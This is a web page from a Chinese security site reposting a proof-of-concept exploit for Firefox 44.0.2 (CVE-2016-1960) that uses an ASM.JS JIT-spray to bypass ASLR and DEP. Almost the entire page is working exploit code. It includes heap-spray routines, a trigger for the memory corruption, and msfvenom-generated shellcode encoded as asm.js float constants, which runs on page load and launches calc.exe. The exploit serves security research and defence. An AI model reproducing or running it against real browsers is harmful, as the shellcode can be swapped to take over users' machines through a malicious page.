首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution
来源:https://rh0dev.github.io/blog 作者:Rh0 发布时间:2018-03-19  
<!DOCTYPE HTML>
 
<!--
 
    FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)
    *PoC* Exploit against Firefox 44.0.2 (CVE-2016-1960)
    ASM.JS float constant pool JIT-Spray special shown at OffensiveCon 2018
 
    Tested on:
    Firefox 44.0.2 32-bit - Windows 10 1709
    https://ftp.mozilla.org/pub/firefox/releases/44.0.2/win32/en-US/Firefox%20Setup%2044.0.2.exe
 
    Howto:
    1) serve PoC over network and open it in Firefox 44.0.2 32-bit
    2) A successfull exploit attempt should pop calc.exe
 
    Mozilla Bug Report:
    https://bugzilla.mozilla.org/show_bug.cgi?id=1246014
 
 
    Writeup:
    https://rh0dev.github.io/blog/2018/more-on-asm-dot-js-payloads-and-exploitation/
 
 
    - For research purposes only -
    
    (C) Rh0
 
    Mar. 13, 2018
 
    Notes:
    *) very similar to CVE-2016-2819, but still different:
    *) this PoC (CVE-2016-1960) does trigger in 44.0.2 but not in 46.0.1
       because in 46.0.1 it is already fixed.
    *) CVE-2016-2819 does trigger the same bug in 44.0.2 and 46.0.1 because it
       was fixed in Firefox > 46.0.1
 
-->
 
<title>CVE-2016-1960 and ASM.JS JIT-Spray</title>
<head>
<meta charset=UTF-8 />
<script>
"use strict"
 
var Exploit = function(){
    this.asmjs = new Asmjs()
    this.heap = new Heap()
}
 
Exploit.prototype.go = function(){
    /* target address of fake node object */
    var node_target_addr = 0x20200000
 
    /* target address of asm.js float pool payload*/
    var target_eip = 0x3c3c1dc8
 
    /* spray fake Node objects */
    this.heap.spray(node_target_addr, target_eip)
 
    /* spray asm.js float constant pools */
    this.asmjs.spray_float_payload(0x1800)
 
    /* go! */
    this.trigger_vuln(node_target_addr)
};
 
 
Exploit.prototype.trigger_vuln = function(node_ptr){
    document.body.innerHTML = '<table><svg><div id="AAAA">'
    this.heap.gc()
    var a = new Array()
    for (var i=0; i < 0x11000; i++){
        /* array element (Node object ptr) control with integer underflow */
        a[i] = new Uint32Array(0x100/4)
        for (var j=0; j<0x100/4; j++)
            a[i][j] = node_ptr
    }
 
    /* original crashing testcase
    document.getElementById('AAAA').innerHTML = '<title><template><td><tr><title><i></tr><style>td</style>';
    */
 
    /* easier to exploit codepath */
    document.getElementById('AAAA').innerHTML = '<title><template><td><tr><title><i></tr><style>td<DD>';
 
    window.location.reload()
};
 
 
var Asmjs = function(){};
 
Asmjs.prototype.asm_js_module = function(stdlib, ffi){
    "use asm"
    var foo = ffi.foo
    function payload(){
        var val = 0.0
        /* Fx 44.0.2 float constant pool of size 0xc0 is at 0xXXXX1dc8*/
        val = +foo(
            // $ msfvenom --payload windows/exec CMD=calc.exe # transformed with sc2asmjs.py
            -1.587865768352248e-263,
            -8.692422460804815e-255,
            7.529882109376901e-114,
            2.0120602207293977e-16,
            3.7204662687249914e-242,
            4.351158092040946e+89,
            2.284741716118451e+270,
            7.620699014501263e-153,
            5.996021286047645e+44,
            -5.981935902612295e-92,
            6.23540918304361e+259,
            1.9227873281657598e+256,
            2.0672493951546363e+187,
            -6.971032919585734e+91,
            5.651413300798281e-134,
            -1.9040061366251406e+305,
            -1.2687640718807038e-241,
            9.697849844423e-310,
            -2.0571400761625145e+306,
            -1.1777948610587587e-123,
            2.708909852013898e+289,
            3.591750823735296e+37,
            -1.7960516725035723e+106,
            6.326776523166028e+180
        )
        return +val;
    }
    return payload
};
 
Asmjs.prototype.spray_float_payload = function(regions){
    this.modules = new Array(regions).fill(null).map(
        region => this.asm_js_module(window, {foo: () => 0})
    )
};
 
var Heap = function(target_addr, eip){
    this.node_heap = []
};
 
 
Heap.prototype.spray = function(node_target_addr, target_eip){
    var junk = 0x13371337
    var current_address = 0x08000000
    var block_size = 0x1000000
    while(current_address < node_target_addr){
        var fake_objects = new Uint32Array(block_size/4 - 0x100)
        for (var offset = 0; offset < block_size; offset += 0x100000){
            /* target Node object needed to control EIP  */
            fake_objects[offset/4 + 0x00/4] = 0x29
            fake_objects[offset/4 + 0x0c/4] = 3
            fake_objects[offset/4 + 0x14/4] = node_target_addr + 0x18
            fake_objects[offset/4 + 0x18/4] = 1
            fake_objects[offset/4 + 0x1c/4] = junk
            fake_objects[offset/4 + 0x20/4] = node_target_addr + 0x24
            fake_objects[offset/4 + 0x24/4] = node_target_addr + 0x28
            fake_objects[offset/4 + 0x28/4] = node_target_addr + 0x2c
            fake_objects[offset/4 + 0x2c/4] = target_eip
        }
        this.node_heap.push(fake_objects)
        current_address += block_size
    }
};
 
Heap.prototype.gc = function(){
    for (var i=0; i<=10; i++)
        var x = new ArrayBuffer(0x1000000)
};
 
</script>
<head>
<body onload='exploit = new Exploit(); exploit.go()' />
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Firefox 46.0.1 - ASM.JS JIT-Sp
·Easy Chat Server 3.1 Buffer Ov
·SAP NetWeaver AS JAVA CRM - Lo
·Linux Kernel < 4.4.0-116 (Ubun
·Android DRM Services - Buffer
·Linux Kernel < 3.5.0-23 (Ubunt
·MikroTik RouterOS < 6.41.3/6.4
·Linux Kernel < 4.4.0-21 (Ubunt
·Spring Data REST < 2.6.9 (Inga
·Crashmail 1.6 Buffer Overflow
·MikroTik RouterOS < 6.38.4 (MI
·Google Software Updater macOS
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved